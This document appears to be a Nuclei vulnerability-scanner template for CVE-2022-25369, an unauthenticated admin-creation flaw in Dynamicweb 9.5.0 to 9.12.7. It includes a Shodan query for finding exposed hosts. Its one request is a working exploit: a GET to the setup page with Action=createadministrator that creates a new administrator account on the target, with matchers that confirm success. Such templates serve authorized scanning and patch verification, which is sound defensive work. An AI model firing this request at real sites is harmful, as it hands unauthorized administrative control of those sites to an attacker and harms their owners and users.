id: CVE-2022-25369

info:
  name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation
  author: pdteam
  severity: critical
  description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user.
  reference:
    - https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-25369
    cwe-id: CWE-425
  remediation: 'Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0.'
  metadata:
    shodan-query: http.component:"Dynamicweb"
  tags: cve,cve2022,dynamicweb,rce,unauth

requests:
  - method: GET
    path:
      - "{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"Success": true'
          - '"Success":true'
        condition: or

      - type: word
        part: header
        words:
          - 'application/json'
          - 'ASP.NET_SessionId'
        condition: and
        case-insensitive: true

      - type: status
        status:
          - 200

# Enhanced by cs on 2022/02/28